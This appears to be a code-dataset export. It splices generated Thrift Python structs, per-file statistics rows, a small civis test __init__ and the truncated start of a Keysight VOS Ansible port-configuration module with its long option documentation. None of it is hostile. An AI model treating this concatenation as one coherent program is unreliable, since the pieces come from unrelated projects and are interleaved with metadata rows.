            oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
            return
        oprot.writeStructBegin('phase_5_message_args')
        if self.p5 is not None:
            oprot.writeFieldBegin('p5', TType.STRUCT, 1)
            self.p5.write(oprot)
            oprot.writeFieldEnd()
        oprot.writeFieldStop()
        oprot.writeStructEnd()

    def validate(self):
        """No required fields to check; always succeeds."""
        return None

    def __hash__(self):
        h = 17
        for field in (self.p5,):
            h = (h * 31) ^ hash(field)
        return h

    def __repr__(self):
        pairs = ('%s=%r' % (k, v) for k, v in self.__dict__.iteritems())
        return '%s(%s)' % (self.__class__.__name__, ', '.join(pairs))

    def __eq__(self, other):
        if not isinstance(other, self.__class__):
            return False
        return self.__dict__ == other.__dict__

    def __ne__(self, other):
        return not self.__eq__(other)
class phase_5_message_result:
    """Thrift result struct for the void phase_5_message call.

    The call returns nothing, so the struct has no declared fields;
    read() simply drains and skips whatever arrives on the wire.
    """

    thrift_spec = ()

    def read(self, iprot):
        """Consume this (empty) struct from *iprot*."""
        if (iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated
                and isinstance(iprot.trans, TTransport.CReadableTransport)
                and self.thrift_spec is not None
                and fastbinary is not None):
            fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
            return
        iprot.readStructBegin()
        while True:
            _, field_type, _ = iprot.readFieldBegin()
            if field_type == TType.STOP:
                break
            iprot.skip(field_type)
            iprot.readFieldEnd()
        iprot.readStructEnd()

    def write(self, oprot):
        """Emit this (empty) struct to *oprot*."""
        if (oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated
                and self.thrift_spec is not None
                and fastbinary is not None):
            oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
            return
        oprot.writeStructBegin('phase_5_message_result')
        oprot.writeFieldStop()
        oprot.writeStructEnd()

    def validate(self):
        """No fields to check; always succeeds."""
        return None

    def __hash__(self):
        # Seed only: no fields contribute.
        return 17

    def __repr__(self):
        pairs = ('%s=%r' % (k, v) for k, v in self.__dict__.iteritems())
        return '%s(%s)' % (self.__class__.__name__, ', '.join(pairs))

    def __eq__(self, other):
        if not isinstance(other, self.__class__):
            return False
        return self.__dict__ == other.__dict__

    def __ne__(self, other):
        return not self.__eq__(other)
class get_peers_args:
    """Thrift argument struct for the get_peers service call.

    The call takes no arguments, so the struct has no declared fields;
    read() simply drains and skips whatever arrives on the wire.
    """

    thrift_spec = ()

    def read(self, iprot):
        """Consume this (empty) struct from *iprot*."""
        if (iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated
                and isinstance(iprot.trans, TTransport.CReadableTransport)
                and self.thrift_spec is not None
                and fastbinary is not None):
            fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
            return
        iprot.readStructBegin()
        while True:
            _, field_type, _ = iprot.readFieldBegin()
            if field_type == TType.STOP:
                break
            iprot.skip(field_type)
            iprot.readFieldEnd()
        iprot.readStructEnd()

    def write(self, oprot):
        """Emit this (empty) struct to *oprot*."""
        if (oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated
                and self.thrift_spec is not None
                and fastbinary is not None):
            oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
            return
        oprot.writeStructBegin('get_peers_args')
        oprot.writeFieldStop()
        oprot.writeStructEnd()

    def validate(self):
        """No fields to check; always succeeds."""
        return None

    def __hash__(self):
        # Seed only: no fields contribute.
        return 17

    def __repr__(self):
        pairs = ('%s=%r' % (k, v) for k, v in self.__dict__.iteritems())
        return '%s(%s)' % (self.__class__.__name__, ', '.join(pairs))

    def __eq__(self, other):
        if not isinstance(other, self.__class__):
            return False
        return self.__dict__ == other.__dict__

    def __ne__(self, other):
        return not self.__eq__(other)
class get_peers_result:
    """Thrift result struct for the get_peers service call.

    Attributes:
     - success: list of Node structs returned by the call (LIST, field id 0)
     - unauthorized: exception raised when the caller lacks access
       (STRUCT, field id 1)
    """

    thrift_spec = (
        (0, TType.LIST, 'success', (TType.STRUCT, (Node, Node.thrift_spec)), None, ),  # 0
        (1, TType.STRUCT, 'unauthorized', (UnauthorizedException, UnauthorizedException.thrift_spec), None, ),  # 1
    )

    def __init__(self, success=None, unauthorized=None,):
        self.success = success
        self.unauthorized = unauthorized

    def read(self, iprot):
        """Deserialize this struct from *iprot*, skipping unknown fields."""
        if (iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated
                and isinstance(iprot.trans, TTransport.CReadableTransport)
                and self.thrift_spec is not None
                and fastbinary is not None):
            fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
            return
        iprot.readStructBegin()
        while True:
            _, field_type, field_id = iprot.readFieldBegin()
            if field_type == TType.STOP:
                break
            if field_id == 0 and field_type == TType.LIST:
                # Decode the list of Node structs element by element.
                self.success = []
                _, list_size = iprot.readListBegin()
                for _ in xrange(list_size):
                    node = Node()
                    node.read(iprot)
                    self.success.append(node)
                iprot.readListEnd()
            elif field_id == 1 and field_type == TType.STRUCT:
                self.unauthorized = UnauthorizedException()
                self.unauthorized.read(iprot)
            else:
                iprot.skip(field_type)
            iprot.readFieldEnd()
        iprot.readStructEnd()

    def write(self, oprot):
        """Serialize this struct to *oprot*; None fields are omitted."""
        if (oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated
                and self.thrift_spec is not None
                and fastbinary is not None):
            oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
            return
        oprot.writeStructBegin('get_peers_result')
        if self.success is not None:
            oprot.writeFieldBegin('success', TType.LIST, 0)
            oprot.writeListBegin(TType.STRUCT, len(self.success))
            for node in self.success:
                node.write(oprot)
            oprot.writeListEnd()
            oprot.writeFieldEnd()
        if self.unauthorized is not None:
            oprot.writeFieldBegin('unauthorized', TType.STRUCT, 1)
            self.unauthorized.write(oprot)
            oprot.writeFieldEnd()
        oprot.writeFieldStop()
        oprot.writeStructEnd()

    def validate(self):
        """No required fields to check; always succeeds."""
        return None

    def __hash__(self):
        h = 17
        for field in (self.success, self.unauthorized):
            h = (h * 31) ^ hash(field)
        return h

    def __repr__(self):
        pairs = ('%s=%r' % (k, v) for k, v in self.__dict__.iteritems())
        return '%s(%s)' % (self.__class__.__name__, ', '.join(pairs))

    def __eq__(self, other):
        if not isinstance(other, self.__class__):
            return False
        return self.__dict__ == other.__dict__

    def __ne__(self, other):
        return not self.__eq__(other)
| 29.912791 | 188 | 0.678076 | 6,103 | 51,450 | 5.406194 | 0.029821 | 0.032127 | 0.026459 | 0.056435 | 0.895375 | 0.864551 | 0.846821 | 0.823604 | 0.799418 | 0.784779 | 0 | 0.009017 | 0.211059 | 51,450 | 1,719 | 189 | 29.930192 | 0.803824 | 0.015024 | 0 | 0.803994 | 1 | 0 | 0.028068 | 0.00219 | 0 | 0 | 0 | 0 | 0 | 1 | 0.144231 | false | 0.028846 | 0.005178 | 0.04216 | 0.288462 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
f93208a2d4c866623e19f750f7fea25bc894c564 | 173 | py | Python | civis/tests/__init__.py | civisanalytics/civis-python | 96a31a77fcf7c9678052f55aafe2939e9f56874f | [
"BSD-3-Clause"
] | 31 | 2016-11-14T14:26:24.000Z | 2021-11-19T15:43:45.000Z | civis/tests/__init__.py | civisanalytics/civis-python | 96a31a77fcf7c9678052f55aafe2939e9f56874f | [
"BSD-3-Clause"
] | 296 | 2016-11-11T20:52:59.000Z | 2022-02-23T13:34:37.000Z | civis/tests/__init__.py | civisanalytics/civis-python | 96a31a77fcf7c9678052f55aafe2939e9f56874f | [
"BSD-3-Clause"
] | 40 | 2016-11-11T20:48:13.000Z | 2021-04-22T17:47:09.000Z | from civis.tests.mocks import (
create_client_mock, create_client_mock_for_container_tests
)
__all__ = ["create_client_mock", "create_client_mock_for_container_tests"]
| 28.833333 | 74 | 0.83237 | 24 | 173 | 5.25 | 0.458333 | 0.380952 | 0.507937 | 0.349206 | 0.777778 | 0.777778 | 0.777778 | 0.777778 | 0.777778 | 0 | 0 | 0 | 0.092486 | 173 | 5 | 75 | 34.6 | 0.802548 | 0 | 0 | 0 | 0 | 0 | 0.323699 | 0.219653 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.25 | 0 | 0.25 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
f9caa62266cb0c7b578f369dc60a1d4e436cbfdc | 79,859 | py | Python | vos_ansible_files/modules/network/vos/vos_ports.py | OpenIxia/AnsibleNVOS | c5d32a1737efa1dd6862f2f8c9074e4ff428b0b6 | [
"MIT"
] | 3 | 2019-10-03T11:56:18.000Z | 2019-11-21T19:22:51.000Z | vos_ansible_files/modules/network/vos/vos_ports.py | OpenIxia/AnsibleVOS | c5d32a1737efa1dd6862f2f8c9074e4ff428b0b6 | [
"MIT"
] | null | null | null | vos_ansible_files/modules/network/vos/vos_ports.py | OpenIxia/AnsibleVOS | c5d32a1737efa1dd6862f2f8c9074e4ff428b0b6 | [
"MIT"
] | null | null | null | """
COPYRIGHT 2021 Keysight Technologies.
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights to
use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies
of the Software, and to permit persons to whom the Software is furnished to do
so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
Keysight Visibility Operating System (VOS) module used to issue Web API calls
implying the 'ports' resource from Ansible.
"""
# Standard Ansible module metadata block: declares the metadata schema
# version, the party supporting the module, and its maturity status.
ANSIBLE_METADATA = {
    'metadata_version': '1.1',
    'supported_by': 'community',
    'status': ['preview']
}
DOCUMENTATION = '''
---
module: vos_ports
short_description: This module handles interactions with Keysight Visibility Operating System (VOS) ports.
version_added: "2.8"
description:
- This module handles interactions with VOS ports settings.
- VOS version 5.2.0
- Sub-options marked as required are mandatory only when the top parameter is used.
options:
port:
description:
- Key used to identify the current entity. Alternative to name. Relevant when the name has to be changed.
type: string
delete:
description:
- Key used to mark that current entity would be deleted.
type: bool
settings:
description:
- The properties to be changed.
type: dict
required: true
suboptions:
afm_pipeline_direction:
description:
- The AFM pipeline direction is a read-only property in most cases, reflecting the mode of any enabled advanced features. The direction is automatically updated any time the mode of an enabled advanced features is changed or when the port mode requires a particular direction. The only case where this property can be updated is when adding a port configured to the SIMPLEX port mode into a port group. If no advanced features are enabled on the port, the system will default to allowing AFM features on the network side and not on the tool side. If the network-side port needs to be put in a port group that doesnt allow advanced features, or the tool-side port needs to be put in an advanced port group, the AFM_PIPELINE_DIRECTION will need to be set to EGRESS.
- Available on all platforms.
type: string
choices: ['EGRESS', 'INGRESS']
cdr_bypass_enabled:
description:
- Available on 7300 Series, E100 Series, Vision Edge OS, Vision X Series.
type: bool
connect_in_access_settings:
description:
- Available on all platforms.
type: dict
suboptions:
groups:
description:
- List of items described below.
- The NAME property of a group
required: true
type: list
policy:
required: true
type: string
choices: ['ALLOW_ALL', 'REQUIRE_MEMBER', 'REQUIRE_ADMIN']
connect_out_access_settings:
description:
- Available on all platforms.
type: dict
suboptions:
groups:
description:
- List of items described below.
- The NAME property of a group
required: true
type: list
policy:
required: true
type: string
choices: ['ALLOW_ALL', 'REQUIRE_MEMBER', 'REQUIRE_ADMIN']
copper_link_polling:
description:
- Enables or disables the setting for link polling for 1000Base-T Copper SFPs. It does not apply to a port group.
- Available on 7300 Series, TradeVision Series, E100 Series, E40 Series, Vision Edge OS, Vision X Series, F100 Series, F400 Series.
type: bool
custom_icon_id:
description:
- Available on all platforms.
type: integer
description:
description:
- Sets the optional, user-assigned port description.
- Available on all platforms.
type: string
direct_attach_copper:
description:
- Enables or disables the flag that sets whether the port is using Direct Attach Copper (enabled) or Fiber (disabled).
- Available on all platforms.
type: bool
enabled:
description:
- Available on all platforms.
type: bool
filter_criteria:
description:
- Available on all platforms.
type: dict
suboptions:
custom_mac_dst:
description:
- List of items described below.
type: list
suboptions:
addr:
description:
- List of items described below.
required: true
type: list
field_name:
type: string
field_set:
type: string
choices: ['FS2', 'FS1', 'BOTH']
custom_mac_flow:
description:
- List of items described below.
type: list
suboptions:
address_sets:
description:
- List of items described below.
required: true
type: list
suboptions:
addr_a:
description:
- List of items described below.
required: true
type: list
addr_b:
description:
- List of items described below.
required: true
type: list
flow_type:
required: true
type: string
choices: ['UNI', 'BIDI']
custom_mac_src:
description:
- List of items described below.
type: list
suboptions:
addr:
description:
- List of items described below.
required: true
type: list
field_name:
type: string
field_set:
type: string
choices: ['FS2', 'FS1', 'BOTH']
custom_mac_src_or_dst:
description:
- List of items described below.
type: list
suboptions:
addr:
description:
- List of items described below.
required: true
type: list
field_name:
type: string
field_set:
type: string
choices: ['FS2', 'FS1', 'BOTH']
custom_mac_srcdst_pair:
description:
- List of items described below.
type: list
suboptions:
addr_a:
description:
- List of items described below.
required: true
type: list
addr_b:
description:
- List of items described below.
required: true
type: list
dscp:
description:
- List of items described below.
type: list
suboptions:
value:
required: true
type: string
ethertype:
description:
- List of items described below.
type: list
suboptions:
value:
required: true
type: string
gtp_teid:
description:
- List of items described below.
type: list
suboptions:
field_name:
type: string
field_set:
type: string
choices: ['FS2', 'FS1', 'BOTH']
value:
required: true
type: integer
inner_ip_protocol:
description:
- List of items described below.
type: list
suboptions:
field_name:
type: string
field_set:
type: string
choices: ['FS2', 'FS1', 'BOTH']
value:
required: true
type: integer
inner_ip_version:
description:
- List of items described below.
type: list
suboptions:
field_name:
type: string
field_set:
type: string
choices: ['FS2', 'FS1', 'BOTH']
value:
required: true
type: string or integer
inner_ipv4_dst_addr:
description:
- List of items described below.
type: list
suboptions:
addr:
description:
- List of items described below.
required: true
type: list
field_name:
type: string
field_set:
type: string
choices: ['FS2', 'FS1', 'BOTH']
inner_ipv4_flow:
description:
- List of items described below.
type: list
suboptions:
address_sets:
description:
- List of items described below.
required: true
type: list
suboptions:
addr_a:
description:
- List of items described below.
required: true
type: list
addr_b:
description:
- List of items described below.
required: true
type: list
flow_type:
required: true
type: string
choices: ['UNI', 'BIDI']
inner_ipv4_l4_dst_port:
description:
- List of items described below.
type: list
suboptions:
field_name:
type: string
field_set:
type: string
choices: ['FS2', 'FS1', 'BOTH']
port:
required: true
type: integer
inner_ipv4_l4_port_flow:
description:
- List of items described below.
type: list
suboptions:
flow_type:
required: true
type: string
choices: ['UNI', 'BIDI']
port_sets:
description:
- List of items described below.
required: true
type: list
suboptions:
port_a:
required: true
type: integer
port_b:
required: true
type: integer
inner_ipv4_l4_src_or_dst_port:
description:
- List of items described below.
type: list
suboptions:
field_name:
type: string
field_set:
type: string
choices: ['FS2', 'FS1', 'BOTH']
port:
required: true
type: integer
inner_ipv4_l4_src_port:
description:
- List of items described below.
type: list
suboptions:
field_name:
type: string
field_set:
type: string
choices: ['FS2', 'FS1', 'BOTH']
port:
required: true
type: integer
inner_ipv4_l4_srcdst_port_pair:
description:
- List of items described below.
type: list
suboptions:
field_name:
type: string
port_a:
required: true
type: integer
port_b:
required: true
type: integer
inner_ipv4_src_addr:
description:
- List of items described below.
type: list
suboptions:
addr:
description:
- List of items described below.
required: true
type: list
field_name:
type: string
field_set:
type: string
choices: ['FS2', 'FS1', 'BOTH']
inner_ipv4_src_or_dst:
description:
- List of items described below.
type: list
suboptions:
addr:
description:
- List of items described below.
required: true
type: list
field_name:
type: string
field_set:
type: string
choices: ['FS2', 'FS1', 'BOTH']
inner_ipv4_srcdst_pair:
description:
- List of items described below.
type: list
suboptions:
addr_a:
description:
- List of items described below.
required: true
type: list
addr_b:
description:
- List of items described below.
required: true
type: list
field_name:
type: string
inner_ipv6_dst_addr:
description:
- List of items described below.
type: list
suboptions:
addr:
description:
- List of items described below.
required: true
type: list
field_name:
type: string
field_set:
type: string
choices: ['FS2', 'FS1', 'BOTH']
inner_ipv6_dst_interface_id:
description:
- List of items described below.
type: list
suboptions:
field_name:
type: string
field_set:
type: string
choices: ['FS2', 'FS1', 'BOTH']
value:
description:
- List of items described below.
required: true
type: list
inner_ipv6_flow:
description:
- List of items described below.
type: list
suboptions:
address_sets:
description:
- List of items described below.
required: true
type: list
suboptions:
addr_a:
description:
- List of items described below.
required: true
type: list
addr_b:
description:
- List of items described below.
required: true
type: list
flow_type:
required: true
type: string
choices: ['UNI', 'BIDI']
inner_ipv6_l4_dst_port:
description:
- List of items described below.
type: list
suboptions:
field_name:
type: string
field_set:
type: string
choices: ['FS2', 'FS1', 'BOTH']
port:
required: true
type: integer
inner_ipv6_l4_port_flow:
description:
- List of items described below.
type: list
suboptions:
flow_type:
required: true
type: string
choices: ['UNI', 'BIDI']
port_sets:
description:
- List of items described below.
required: true
type: list
suboptions:
port_a:
required: true
type: integer
port_b:
required: true
type: integer
inner_ipv6_l4_src_or_dst_port:
description:
- List of items described below.
type: list
suboptions:
field_name:
type: string
field_set:
type: string
choices: ['FS2', 'FS1', 'BOTH']
port:
required: true
type: integer
inner_ipv6_l4_src_port:
description:
- List of items described below.
type: list
suboptions:
field_name:
type: string
field_set:
type: string
choices: ['FS2', 'FS1', 'BOTH']
port:
required: true
type: integer
inner_ipv6_l4_srcdst_port_pair:
description:
- List of items described below.
type: list
suboptions:
field_name:
type: string
port_a:
required: true
type: integer
port_b:
required: true
type: integer
inner_ipv6_src_addr:
description:
- List of items described below.
type: list
suboptions:
addr:
description:
- List of items described below.
required: true
type: list
field_name:
type: string
field_set:
type: string
choices: ['FS2', 'FS1', 'BOTH']
inner_ipv6_src_interface_id:
description:
- List of items described below.
type: list
suboptions:
field_name:
type: string
field_set:
type: string
choices: ['FS2', 'FS1', 'BOTH']
value:
description:
- List of items described below.
required: true
type: list
inner_ipv6_src_or_dst:
description:
- List of items described below.
type: list
suboptions:
addr:
description:
- List of items described below.
required: true
type: list
field_name:
type: string
field_set:
type: string
choices: ['FS2', 'FS1', 'BOTH']
inner_ipv6_srcdst_pair:
description:
- List of items described below.
type: list
suboptions:
addr_a:
description:
- List of items described below.
required: true
type: list
addr_b:
description:
- List of items described below.
required: true
type: list
field_name:
type: string
inner_vlan:
description:
- List of items described below.
type: list
suboptions:
priority:
type: string
vlan_id:
type: integer
ip_fragment:
description:
- List of items described below.
type: list
suboptions:
value:
required: true
type: string
choices: ['NON_FRAGMENT', 'FRAGMENT', 'FIRST_FRAGMENT']
ip_protocol:
description:
- List of items described below.
type: list
suboptions:
value:
required: true
type: integer
ipv4_dst:
description:
- List of items described below.
type: list
suboptions:
addr:
description:
- List of items described below.
required: true
type: list
ipv4_flow:
description:
- List of items described below.
type: list
suboptions:
address_sets:
description:
- List of items described below.
required: true
type: list
suboptions:
addr_a:
description:
- List of items described below.
required: true
type: list
addr_b:
description:
- List of items described below.
required: true
type: list
flow_type:
required: true
type: string
choices: ['UNI', 'BIDI']
ipv4_session_dst:
description:
- List of items described below.
- The IPv4 session specifications may have either the address be set to all don't care (CIDR is 0 or the Netmask is 0.0.0.0) or the port be don't care (left blank), but not both.
type: list
suboptions:
sessions:
description:
- List of items described below.
- An IPv4 address and a port. The port may be left blank, as in 3.2.1.0/20. If the CIDR is 0 or the Netmask is 0000, then the criterion will not filter on the address at all, meaning there would be no distinction between an IPv4 and IPv6 address. Examples (CIDR) 11.22.33.44/2415-17, 19, (Netmask) 10.11.12.13/255.255.255.10530, (No mask type) 90.80.70.60-6514, 17, 20-22
required: true
type: list
ipv4_session_flow:
description:
- List of items described below.
type: list
suboptions:
flow_type:
required: true
type: string
choices: ['UNI', 'BIDI']
session_sets:
description:
- List of items described below.
- A flow set allows only one IPv4 specification where both the address is all don't care (CIDR is 0 or the Netmask is 0.0.0.0) and the port is don't care (left blank), whether in the a_session or b_session.
required: true
type: list
suboptions:
a_sessions:
description:
- List of items described below.
- An IPv4 address and a port. The port may be left blank, as in 3.2.1.0/20. If the CIDR is 0 or the Netmask is 0000, then the criterion will not filter on the address at all, meaning there would be no distinction between an IPv4 and IPv6 address. Examples (CIDR) 11.22.33.44/2415-17, 19, (Netmask) 10.11.12.13/255.255.255.10530, (No mask type) 90.80.70.60-6514, 17, 20-22
required: true
type: list
b_sessions:
description:
- List of items described below.
- An IPv4 address and a port. The port may be left blank, as in 3.2.1.0/20. If the CIDR is 0 or the Netmask is 0000, then the criterion will not filter on the address at all, meaning there would be no distinction between an IPv4 and IPv6 address. Examples (CIDR) 11.22.33.44/2415-17, 19, (Netmask) 10.11.12.13/255.255.255.10530, (No mask type) 90.80.70.60-6514, 17, 20-22
required: true
type: list
ipv4_session_src:
description:
- List of items described below.
- The IPv4 session specifications may have either the address be set to all don't care (CIDR is 0 or the Netmask is 0.0.0.0) or the port be don't care (left blank), but not both.
type: list
suboptions:
sessions:
description:
- List of items described below.
- An IPv4 address and a port. The port may be left blank, as in 3.2.1.0/20. If the CIDR is 0 or the Netmask is 0000, then the criterion will not filter on the address at all, meaning there would be no distinction between an IPv4 and IPv6 address. Examples (CIDR) 11.22.33.44/2415-17, 19, (Netmask) 10.11.12.13/255.255.255.10530, (No mask type) 90.80.70.60-6514, 17, 20-22
required: true
type: list
ipv4_session_src_or_dst:
description:
- List of items described below.
- The IPv4 session specifications may have either the address be set to all don't care (CIDR is 0 or the Netmask is 0.0.0.0) or the port be don't care (left blank), but not both.
type: list
suboptions:
sessions:
description:
- List of items described below.
- An IPv4 address and a port. The port may be left blank, as in 3.2.1.0/20. If the CIDR is 0 or the Netmask is 0000, then the criterion will not filter on the address at all, meaning there would be no distinction between an IPv4 and IPv6 address. Examples (CIDR) 11.22.33.44/2415-17, 19, (Netmask) 10.11.12.13/255.255.255.10530, (No mask type) 90.80.70.60-6514, 17, 20-22
required: true
type: list
ipv4_src:
description:
- List of items described below.
type: list
suboptions:
addr:
description:
- List of items described below.
required: true
type: list
ipv4_src_or_dst:
description:
- List of items described below.
type: list
suboptions:
addr:
description:
- List of items described below.
required: true
type: list
ipv4_srcdst_pair:
description:
- List of items described below.
type: list
suboptions:
addr_a:
description:
- List of items described below.
required: true
type: list
addr_b:
description:
- List of items described below.
required: true
type: list
field_name:
type: string
ipv6_dst:
description:
- List of items described below.
type: list
suboptions:
addr:
description:
- List of items described below.
required: true
type: list
ipv6_flow:
description:
- List of items described below.
type: list
suboptions:
address_sets:
description:
- List of items described below.
required: true
type: list
suboptions:
addr_a:
description:
- List of items described below.
required: true
type: list
addr_b:
description:
- List of items described below.
required: true
type: list
flow_type:
required: true
type: string
choices: ['UNI', 'BIDI']
ipv6_session_dst:
description:
- List of items described below.
- The IPv6 session specification may have either the address be set to all don't care (CIDR is 0 or the Netmask is 00000000) or the port be don't care (left blank), but not both.
type: list
suboptions:
sessions:
description:
- List of items described below.
- An IPv6 address and a port. The port may be left blank, as in 3210dcba. If a CIDR of 0 or a Netmask of 00000000 is used, then the criterion will not filter on the address at all, meaning there would be no distinction between an IPv4 and IPv6 address. Note that protocol calls for the IPv6 address portion to appear within square brackets [12345678]24. However, since JSON already uses square brackets to denote an array, the address should not appear within square brackets - the port will be assumed to follow the last colon. Examples (CIDR) 1122334455667788/2415-17, 19, (Netmask) 1011121314151617/255.255.255.10530, (No mask type) 90.80.70.605040302014, 17, 20-22
required: true
type: list
ipv6_session_flow:
description:
- List of items described below.
type: list
suboptions:
flow_type:
required: true
type: string
choices: ['UNI', 'BIDI']
session_sets:
description:
- List of items described below.
- A flow set allows only one IPv6 specification where both the address is all don't care (CIDR is 0 or the Netmask is 00000000) and the port is don't care (left blank), whether in the a_session or b_session.
required: true
type: list
suboptions:
a_sessions:
description:
- List of items described below.
- An IPv6 address and a port. The port may be left blank, as in 3210dcba. If a CIDR of 0 or a Netmask of 00000000 is used, then the criterion will not filter on the address at all, meaning there would be no distinction between an IPv4 and IPv6 address. Note that protocol calls for the IPv6 address portion to appear within square brackets [12345678]24. However, since JSON already uses square brackets to denote an array, the address should not appear within square brackets - the port will be assumed to follow the last colon. Examples (CIDR) 1122334455667788/2415-17, 19, (Netmask) 1011121314151617/255.255.255.10530, (No mask type) 90.80.70.605040302014, 17, 20-22
required: true
type: list
b_sessions:
description:
- List of items described below.
- An IPv6 address and a port. The port may be left blank, as in 3210dcba. If a CIDR of 0 or a Netmask of 00000000 is used, then the criterion will not filter on the address at all, meaning there would be no distinction between an IPv4 and IPv6 address. Note that protocol calls for the IPv6 address portion to appear within square brackets [12345678]24. However, since JSON already uses square brackets to denote an array, the address should not appear within square brackets - the port will be assumed to follow the last colon. Examples (CIDR) 1122334455667788/2415-17, 19, (Netmask) 1011121314151617/255.255.255.10530, (No mask type) 90.80.70.605040302014, 17, 20-22
required: true
type: list
ipv6_session_src:
description:
- List of items described below.
- The IPv6 session specification may have either the address be set to all don't care (CIDR is 0 or the Netmask is 00000000) or the port be don't care (left blank), but not both.
type: list
suboptions:
sessions:
description:
- List of items described below.
- An IPv6 address and a port. The port may be left blank, as in 3210dcba. If a CIDR of 0 or a Netmask of 00000000 is used, then the criterion will not filter on the address at all, meaning there would be no distinction between an IPv4 and IPv6 address. Note that protocol calls for the IPv6 address portion to appear within square brackets [12345678]24. However, since JSON already uses square brackets to denote an array, the address should not appear within square brackets - the port will be assumed to follow the last colon. Examples (CIDR) 1122334455667788/2415-17, 19, (Netmask) 1011121314151617/255.255.255.10530, (No mask type) 90.80.70.605040302014, 17, 20-22
required: true
type: list
ipv6_session_src_or_dst:
description:
- List of items described below.
- The IPv6 session specification may have either the address be set to all don't care (CIDR is 0 or the Netmask is 00000000) or the port be don't care (left blank), but not both.
type: list
suboptions:
sessions:
description:
- List of items described below.
- An IPv6 address and a port. The port may be left blank, as in 3210dcba. If a CIDR of 0 or a Netmask of 00000000 is used, then the criterion will not filter on the address at all, meaning there would be no distinction between an IPv4 and IPv6 address. Note that protocol calls for the IPv6 address portion to appear within square brackets [12345678]24. However, since JSON already uses square brackets to denote an array, the address should not appear within square brackets - the port will be assumed to follow the last colon. Examples (CIDR) 1122334455667788/2415-17, 19, (Netmask) 1011121314151617/255.255.255.10530, (No mask type) 90.80.70.605040302014, 17, 20-22
required: true
type: list
ipv6_src:
description:
- List of items described below.
type: list
suboptions:
addr:
description:
- List of items described below.
required: true
type: list
ipv6_src_or_dst:
description:
- List of items described below.
type: list
suboptions:
addr:
description:
- List of items described below.
required: true
type: list
ipv6_srcdst_pair:
description:
- List of items described below.
type: list
suboptions:
addr_a:
description:
- List of items described below.
required: true
type: list
addr_b:
description:
- List of items described below.
required: true
type: list
field_name:
type: string
layer4_dst_port:
description:
- List of items described below.
type: list
suboptions:
port:
required: true
type: integer
layer4_port_flow:
description:
- List of items described below.
type: list
suboptions:
flow_type:
required: true
type: string
choices: ['UNI', 'BIDI']
port_sets:
description:
- List of items described below.
required: true
type: list
suboptions:
port_a:
required: true
type: integer
port_b:
required: true
type: integer
layer4_src_or_dst_port:
description:
- List of items described below.
type: list
suboptions:
port:
required: true
type: integer
layer4_src_port:
description:
- List of items described below.
type: list
suboptions:
port:
required: true
type: integer
layer4_srcdst_port_pair:
description:
- List of items described below.
type: list
suboptions:
field_name:
type: string
port_a:
required: true
type: integer
port_b:
required: true
type: integer
logical_operation:
type: string
choices: ['OR', 'AND']
mac_dst:
description:
- List of items described below.
type: list
suboptions:
addr:
description:
- List of items described below.
type: list
admin_type:
type: string
choices: ['UNIVERSAL', 'LOCAL', 'ANY']
dest_addr_type:
required: true
type: string
choices: ['GROUP', 'ANY', 'INDIVIDUAL']
mac_flow:
description:
- List of items described below.
type: list
suboptions:
address_sets:
description:
- List of items described below.
required: true
type: list
suboptions:
addr_a:
description:
- List of items described below.
required: true
type: list
addr_b:
description:
- List of items described below.
required: true
type: list
flow_type:
required: true
type: string
choices: ['UNI', 'BIDI']
mac_src:
description:
- List of items described below.
type: list
suboptions:
addr:
description:
- List of items described below.
type: list
admin_type:
type: string
choices: ['UNIVERSAL', 'LOCAL', 'ANY']
mac_src_or_dst:
description:
- List of items described below.
type: list
suboptions:
addr:
description:
- List of items described below.
required: true
type: list
mac_srcdst_pair:
description:
- List of items described below.
type: list
suboptions:
addr_a:
description:
- List of items described below.
required: true
type: list
addr_b:
description:
- List of items described below.
required: true
type: list
mpls_label:
description:
- List of items described below.
type: list
suboptions:
field_name:
type: string
field_set:
type: string
choices: ['FS2', 'FS1', 'BOTH']
is_capture_mpls_label:
description:
- The is_capture_mpls_label property should be set to true only when creating an MPLS label trigger criteria for a Capture Resource.
type: bool
label_level:
description:
- The label_level property is required only when creating an MPLS label trigger criteria for a Capture Resource.
type: integer
value:
required: true
type: integer
outer_tpid:
description:
- List of items described below.
type: list
suboptions:
value:
